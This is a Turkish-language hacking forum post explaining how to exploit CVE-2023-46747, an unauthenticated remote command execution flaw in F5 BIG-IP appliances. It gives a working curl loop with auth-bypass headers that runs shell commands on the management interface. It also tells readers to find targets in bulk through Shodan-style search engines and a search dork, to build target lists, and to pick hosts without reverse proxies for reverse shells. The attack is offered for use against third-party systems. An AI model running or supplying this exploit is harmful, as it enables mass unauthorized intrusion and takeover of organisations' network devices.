F5 - Big İp Exploit

lyxG

Anka Team Junior
15 Ocak 2019
303
71
Merhaba, bu konumuzda F5 BIG IP NONE AUTH RCE incelemesi yapacağız. İnternet üzerinden işlem yapılabilen panele sahip bir uygulama. DNS ve disk yönetimi ile ilgili işlemler yapılabilecek bir uygulama olarak karşımıza çıkıyor.

İlgili sistemin zafiyetlerini bulmak için exploit-db yi ziyaret etmem yetti ve sonuçta CVE-2023-46747 adlı zafiyetimiz mevcut. Peki bu servise sahip olan web servislerini nasıl bulacağız diyorsan Hunter Search Engine adlı web site veya shodan işini görecektir.


ii.jpg



Bu servisi http protokolü ile kullanan on binlerce hedef mevcut. Kendinize bir hedef listesi hazırlayabilir aynı anda bunları check edebilirsiniz. Peki exploit nasıl çalışıyor ?

CVE-2023-46747, F5 BIG-IP cihazlarında bulunan kritik bir güvenlik açığıdır. Bu açık, kimlik doğrulaması yapılmamış saldırganların yönetim portu ve/veya kendi IP adresleri aracılığıyla BIG-IP sistemine ağ erişimi sağlayarak keyfi sistem komutları çalıştırmasına olanak tanır.

Auth bypass edilip admin sayfasına bizi atmadan default /bash üzerinden komutlar çalıştıracağız.


i.jpg


echo <ip> | while read ip; do curl -H "Host: localhost:8100" -H "Content-Type: application/json" -H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" -H "Authorization: Basic YWRtaW46" \ http://$ip/mgmt/tm/util/bash \ -d '{"command":"run","utilCmdArgs":"-c id"}';done

{"command": "run" , "utilCmdArgs": " -c ' env' " }

Connection tarafından gerekli parametreleri verip hem auth. kısmını bypass edebildik hemde komut çalıştırabileceğimiz bölgeye geldik
Deneme yaptığınız sistemlerde olası Reverse shell almak istiyorsanız reverse proxy kullanmayan hedefleri tercih ediniz. Düz reverse proxy kullanıyorsa maalesef ki shell oturumu alamazsınız, shell denemeleri için ;
https://www.revshells.com/

Dork: title:"BIG-IP"
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.